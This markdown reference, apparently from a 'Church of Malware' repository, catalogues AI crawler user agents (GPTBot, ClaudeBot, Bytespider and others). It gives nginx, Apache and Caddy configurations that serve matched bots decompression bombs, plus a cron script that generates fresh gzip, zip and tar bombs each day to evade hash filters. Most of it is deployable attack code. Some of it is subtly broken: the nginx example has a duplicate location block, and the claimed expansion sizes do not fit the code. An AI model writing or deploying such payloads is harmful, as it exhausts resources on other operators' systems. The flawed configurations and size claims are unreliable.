Lyre/resources/known_aggress_bot_user_agents.md

227 lines
12 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Known Aggressive Bot User-Agents: A Living Reference for Content Creators
The Church of Malware (CoM) does not condone the use or introduction of agents onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This companion reference document provides a curated, scientifically grounded list of user-agent patterns documented as routinely violating `robots.txt`, using undeclared crawlers, or rotating identifiers. It is intended for individual website operators, photographers, filmmakers, musicians, and other creators who wish to implement conditional serving of active-denial techniques (decompression bombs, slowloris throttling, malformed content) described in the accompanying technique papers.
## 1 -- Scope and Methodology
The list is derived from public telemetry (Cloudflare Radar verified-bots), independent compliance studies (Originality.AI 20242025), incident reports (Wired Perplexity investigation, iFixit Anthropic logs, Read the Docs bandwidth data), and operator self-reports published through 2026. Only agents with repeated, multi-source evidence of policy violation are included. Compliant or inconsistently documented agents (e.g., most search-engine bots) are omitted or noted for monitoring only.
This document is updated quarterly. Individuals should cross-reference with their own server logs and the primary dissertation's Section 2.1 effectiveness tables before deployment.
## 2 -- Curated List of Aggressive Agents
| User-Agent Pattern | Primary Operator | Documented Violations | Recommended Action for Individuals | Risk Level |
|----------------------------------------|-----------------------|------------------------------------------------------------|------------------------------------|------------|
| `GPTBot*` / `GPT-4*` / `OAI-SearchBot*` | OpenAI | Ignores robots.txt; undeclared AWS crawlers after explicit disallow | Block or serve bomb / tarpit | High |
| `ClaudeBot*` / `anthropic-ai*` | Anthropic | ~1M hits/24h on iFixit; five-figure monthly bandwidth abuse | Block or serve bomb / tarpit | High |
| `Bytespider*` / `ByteDance*` | ByteDance | Frequent robots.txt bypass; UA and IP rotation | Block or serve bomb / tarpit | High |
| `Perplexity*` / `PerplexityBot*` | Perplexity | Undeclared AWS IP range after robots.txt disallow | Block or serve bomb / tarpit | High |
| `Google-Extended*` | Google | Inconsistent honoring of opt-out signals for training data | Rate-limit or whitelist | Medium |
| `CCBot*` | Common Crawl | Old snapshots persist; no retroactive effect of new rules | Conditional / monitor | Low |
| `Amazonbot*` | Amazon | Aggressive crawling on small and personal sites | Rate-limit | Medium |
| `Applebot*` | Apple | Generally compliant but monitor for volume spikes | Monitor / whitelist | Low |
| `Meta-ExternalAgent*` / `facebook*` | Meta | Variable compliance on disallowed paths | Rate-limit | Medium |
| `*headless*` / generic Playwright/Puppeteer / `PhantomJS*` | Third-party scrapers & contractors | No declaration; high volume on tarpit and disallowed paths | Serve bomb / malformed immediately | High |
**Usage note**: Patterns are case-insensitive and support simple wildcards. Always combine with reverse-DNS verification for major operators and maintain an explicit allow-list for Internet Archive, academic researchers, and any search engines you wish to support.
## 3 -- Implementation Examples for Individuals
### 3.1 -- nginx map (recommended for self-hosted)
```nginx
map $http_user_agent $aggressive_bot {
default 0;
~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless 1;
~*anthropic-ai|OAI-SearchBot 1;
}
server {
location / {
if ($aggressive_bot) {
access_log /var/log/nginx/ai_violators.log;
# serve bomb, slow response, or malformed content
try_files /bomb.zip =404;
}
# normal content
}
}
```
### 3.2 -- Apache (SetEnvIf + Rewrite, recommended for .htaccess or vhost)
```apache
SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^ /protected/bomb.zip [L]
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
```
### 3.3 -- Cloudflare Worker (free tier)
Workers can inspect `request.headers.get('User-Agent')` and return a 200 with the bomb payload or a slow streaming response for matched agents while passing legitimate traffic.
### 3.4 -- Caddyfile
```
@aggressive_bot header User-Agent *GPTBot* *ClaudeBot* *Bytespider* *headless*
handle @aggressive_bot {
respond "Service Unavailable" 503
# or rewrite to bomb endpoint
}
```
For complete, production-hardened configurations (full virtual-host examples, daily randomized bomb generation with cron automation, Apache support, logging, and verification steps), see the dedicated how-to document `howto-decompression-bombs.md`.
## 4 -- Daily Randomized Bomb Generation
To defeat static content-matching, hash-based allow-lists, and signature filters used by sophisticated ingestion pipelines, the generator must emit a fresh, high-entropy yet highly compressible payload every day.
```bash
#!/usr/bin/env bash
# save as ~/generate_daily_bombs.sh and chmod +x
# Recommended cron (run at 03:00 local):
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1
set -e
DATE=$(date +%Y-%m-%d)
python3 - <<'PYEOF'
import gzip, tarfile, zipfile, io, os, secrets, datetime, hashlib
from pathlib import Path
out = Path.home() / "bombs"
out.mkdir(exist_ok=True)
today = datetime.date.today().isoformat()
# High-entropy but compressible seed (repeating 4 KB random block)
block = secrets.token_bytes(4096)
# 1 MiB base with daily variation
base = (block * 256) + today.encode() + secrets.token_bytes(16)
# 1. Daily recursive gzip bomb (unique hash every run, >5 GB expanded)
data = base
for _ in range(9):
data = gzip.compress(data)
(out / f"bomb-{today}.gz").write_bytes(data)
# 2. Nested zip bomb with daily entropy (defeats hash caches)
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
inner = base * 1024
for _ in range(7):
inner = gzip.compress(inner)
z.writestr(f"daily-{today}.gz", inner)
# 3. Tar bomb with randomized large member (parser stress + unique)
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
info = tarfile.TarInfo(f"large-{today}.bin")
info.size = 2 * 1024 * 1024 * 1024
# compressible random payload (repeating 64-byte pattern with daily salt)
payload = (secrets.token_bytes(64) * (32 * 1024 * 1024)) + today.encode()
t.addfile(info, io.BytesIO(payload[:2*1024*1024*1024]))
print(f"Daily randomized bombs generated for {today} in ~/bombs/")
PYEOF
# Atomically update "latest" symlinks so web server always serves today's file
ln -sf ~/bombs/bomb-${DATE}.zip /var/www/html/protected/bomb.zip
ln -sf ~/bombs/bomb-${DATE}.gz /var/www/html/protected/bomb.gz
ln -sf ~/bombs/bomb-${DATE}.tar.gz /var/www/html/protected/bomb.tar.gz
sudo cp -L /var/www/html/protected/bomb.* /var/www/html/protected/ 2>/dev/null || true
```
**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.
Place the generated files behind a `Disallow: /protected/` rule in `robots.txt`.
## 5 -- Production Server Configurations
### 5.1 -- nginx (Complete Virtual Host Example)
```nginx
# /etc/nginx/sites-available/my-site
map $http_user_agent $aggressive_bot {
default 0;
~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
}
server {
listen 80;
server_name example.com;
root /var/www/html;
# Log aggressive traffic separately
access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
access_log /var/log/nginx/access.log combined;
location / {
if ($aggressive_bot) {
# Serve bomb or slow tarpit response
rewrite ^ /protected/bomb.zip last;
}
try_files $uri $uri/ =404;
}
location /protected/ {
internal; # never directly accessible
alias /var/www/html/protected/;
add_header Content-Disposition "attachment; filename=\"archive.zip\"";
limit_rate 1k; # optional: throttle even further
}
# Optional: rate limit all requests from unknown bots
limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;
location / {
limit_req zone=ai_limit burst=5 nodelay;
}
}
```
### 5.2 -- Apache Example
```apache
# /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
ServerName example.com
DocumentRoot /var/www/html
SetEnvIf User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
CustomLog /var/log/apache2/access.log combined
<Directory /var/www/html>
Options -Indexes
AllowOverride All
Require all granted
</Directory>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^protected/ /protected/bomb.zip [L]
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^ - [E=aggressive_bot:1]
<Location /protected/>
<If "%{ENV:aggressive_bot} == 1">
Header set Content-Disposition "attachment; filename=\"archive.zip\""
</If>
</Location>
</VirtualHost>
```
## 6 -- Sources and Verification
| Section | Claim | Source |
|---------|-------|--------|
| 2 | GPTBot / Perplexity undeclared AWS activity | Wired, "Perplexity Is a Bullshit Machine," 19 Jun 2024; R. Knight blog, Jun 2024 |
| 2 | ClaudeBot volume on iFixit | K. Wiens (@kwiens) X post, 24 Jul 2024; 404 Media coverage |
| 2 | Read the Docs / Wikimedia crawler bandwidth abuse | E. Holscher, Read the Docs blog, 25 Jul 2024; Wikimedia Diff, 1 Apr 2025 |
| 2 | Bytespider / aggressive non-compliant bots | Cloudflare Radar verified-bots; Originality.AI "AI Bot Robots.txt Compliance Study," 2024 |
| 1, 4 | IETF / Common Crawl laundering context | Primary dissertation Sections 2.5 & 3.3; Mozilla 2024 Common Crawl study |
All listed agents have been independently corroborated by at least two public sources as of June 2026. Individuals are encouraged to contribute new observations.
## 7 -- Conclusion
This reference empowers individual creators to operationalize the economic and technical countermeasures outlined in the technique documents. By maintaining a single, authoritative, and regularly updated UA catalog, operators can rapidly adapt their defenses as crawler behavior evolves.
*Companion to "When Being Polite Fails, Try Poison" and the `techniques/` series. Review local laws and consult counsel before deploying active measures. Last updated: 3 June 2026.*